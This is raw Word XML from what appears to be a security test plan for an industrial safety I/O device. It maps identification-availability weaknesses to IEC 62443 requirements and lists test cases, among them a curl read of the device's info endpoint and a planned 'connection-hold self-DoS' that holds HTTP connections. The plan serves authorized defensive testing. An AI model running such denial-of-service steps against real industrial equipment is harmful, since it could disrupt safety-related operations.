        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(e) EMC disturbance</w:t>
      </w:r>
      <w:r w:rsidR="009470E7" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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G-2</w:t>
      </w:r>
      <w:r w:rsidR="009470E7" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00231EB5" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3 (no redundancy)</w:t>
      </w:r>
      <w:r w:rsidR="004D03E2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A COM fault or SysCom timeout removes identification availability entirely while the safety function persists </w:t>
      </w:r>
      <w:r w:rsidR="004D03E2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> identification is structurally LESS available than the safety function it describes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA97310" w14:textId="77777777" w:rsidR="003E7C2C" w:rsidRPr="006D5B99" w:rsidRDefault="003E7C2C" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586859BC" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBF3107" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B521CA" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7A0B06" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B366EBF" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2921458A" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42446AA0" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1070244D" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4FBDD0" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBA8594" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E81347" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8D5E79" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="006D5B99" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DB74E3" w14:textId="77777777" w:rsidR="00EC1E6E" w:rsidRPr="006D5B99" w:rsidRDefault="00EC1E6E" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E60CFE3" w14:textId="3F1133BE" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="00276049">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE580F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0FC50"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F2C639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4F4E8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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A1114B5" w14:textId="77777777" w:rsidR="0056173B"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Retrieve identification via IoT-Core + Visualizer in OPERATE; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A9FA7F" w14:textId="65D651E8" w:rsidR="00900880" w:rsidRPr="006D5B99"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human-readable, browser-accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FBD338" w14:textId="18F48BB7" w:rsidR="00900880" w:rsidRPr="006D5B99"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Functional CR 7.8; confirms "easily accessible" </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E2F990" w14:textId="2F79E37D"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verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="098CEA93" w14:textId="008115F1" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26628F48" w14:textId="77777777" w:rsidR="00B7134D"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Availability-across-states: continuously poll while driving Init (power-cycle), Update (999 + install reboot), FatalError; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0C276F" w14:textId="6CA58EC2" w:rsidR="00900880" w:rsidRPr="006D5B99"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log outage windows + SCPU-flash window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C51BC11" w14:textId="1E80D4AA" w:rsidR="00900880" w:rsidRPr="006D5B99"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 (not available "at all times"</w:t>
            </w:r>
            <w:r w:rsidR="00B7134D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>design, not attack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A8C3FF" w14:textId="3676EFEE"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4373F616" w14:textId="0E31FC95"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1047CC1E" w14:textId="77777777" w:rsidR="007E4FD1"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Connection-hold self-DoS: open and hold 2 HTTP connections; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1583FC4F" w14:textId="0BDF4ADE" w:rsidR="00900880" w:rsidRPr="006D5B99"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 3rd legitimate identification read</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03730CBD" w14:textId="4F5869EC" w:rsidR="00900880" w:rsidRPr="006D5B99"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(the CR 7.1 mechanism is itself a CR 7.1 weakness)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33126574" w14:textId="58FF8CB6"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T0814</w:t>
            </w:r>
            <w:r w:rsidR="000405C0" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1409074B" w14:textId="77777777" w:rsidR="00507F15" w:rsidRPr="006D5B99"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§5.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FBC5E50" w14:textId="45148769" w:rsidR="00900880" w:rsidRPr="006D5B99" w:rsidRDefault="005028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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287B10FC" w14:textId="7C6C426B" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB80458" w14:textId="0CE64BC3" w:rsidR="00900880" w:rsidRPr="006D5B99"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Redundancy check: with a COM/SysCom interruption present, confirm identification is unavailable while the safety function persists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548B7F61" w14:textId="4B2CE0D3" w:rsidR="00900880" w:rsidRPr="006D5B99"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(availability inversion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21111E9F" w14:textId="77777777" w:rsidR="00802DB8"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§3.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A29D29" w14:textId="22F16089" w:rsidR="00900880" w:rsidRPr="006D5B99"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2773D71B" w14:textId="6425F62A" w:rsidR="00900880" w:rsidRPr="006D5B99"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431426E2" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8FC661" w14:textId="77777777" w:rsidR="004911CD" w:rsidRPr="006D5B99" w:rsidRDefault="004911CD" w:rsidP="004911CD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772489C2" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC5D9A0" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C679905" w14:textId="7376BE2D" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="0069129D" w:rsidP="00DC6D46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1522"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB51FED" w14:textId="6EE1C197" w:rsidR="00DC6D46" w:rsidRPr="006D5B99" w:rsidRDefault="00DC6D46" w:rsidP="00DC6D46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ007-01 -  Identification Availability &amp; Accessibility Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72345BDD" w14:textId="77777777" w:rsidR="00DC6D46" w:rsidRPr="006D5B99" w:rsidRDefault="00DC6D46" w:rsidP="00DC6D46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1522"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B81E6B5"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A3DD68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7EE172E1" w14:textId="21DC5DE9" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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Pr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 / CR 6.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset H, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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24BC80" w14:textId="44579796"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functional/accessibility verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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4F9BD1C9" w14:textId="303A91FA" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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27EF1DAF" w14:textId="2B7141E1" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99"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2DA57A2C"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the device's browser-based information interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404CA6C0" w14:textId="77777777" w:rsidR="00B92677"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Retrieve all safety-relevant software identifiers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104DA072" w14:textId="57A5F980" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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values are human-readable and the interface renders without special tooling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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4EA1BC23" w14:textId="77777777" w:rsidR="00B92677"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interface loads and all safety-relevant identifiers are shown in human-readable form. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26957291" w14:textId="133E0DBD" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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identifier is unreadable or the interface is inaccessible in normal operation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="436E8A90" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C682D1" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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F4BE5F6"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09E48433" w14:textId="0F18F029" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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TC-RQ007-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6C331B" w14:textId="490447E2" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00C42274"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r w:rsidR="00E211F2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">+ </w:t>
            </w:r>
            <w:r w:rsidR="00E211F2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>device in</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> OPERATE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B01543E" w14:textId="4D978BCF" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00C42274"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Browser (IoT-Core Visualizer), curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0A1511"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Manual step on laptop (Port 4):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD70C43"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Open browser -&gt; navigate to http://192.168.0.2/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30FE2D13"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-&gt; IoT-Core Visualizer should load; navigate to the "deviceinfo" menu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2213F75D"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-&gt; Take a screenshot as proof of it being "human-readable, easily accessible"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73056CDE"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22E88CB" w14:textId="77777777" w:rsidR="003528C9"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Kali command (supplementary proof via curl):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A3CE103" w14:textId="3E42AF3C" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="003528C9" w:rsidP="003528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curl -s http://$SRIO/deviceinfo/swrevision/getdata | tee cm_rq007-01_swrev.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270A055C" w14:textId="0289AEC1" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected PASS: Visualizer loads without special tooling; all safety-relevant identifiers human-readable. Evidence: Visualizer screenshot, cm_rq007-01_swrev.txt. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3448CBC8" w14:textId="286A27B4" w:rsidR="007702A5" w:rsidRPr="006D5B99" w:rsidRDefault="007702A5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781999ED" w14:textId="77777777" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F6C9CB" w14:textId="69DDB8C6" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105D20" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ007-02 -  Identification Availability Across Operating States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D664CB3"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6F2514EF"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2684F895" w14:textId="3EBAE064" w:rsidR="0069129D" w:rsidRPr="006D5B99"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RQ-007 </w:t>
            </w:r>
            <w:r w:rsidR="00F022B7" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 / (availability, FR 7) </w:t>
            </w:r>
            <w:r w:rsidR="00F022B7" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset H, Asset D</w:t>
            </w:r>
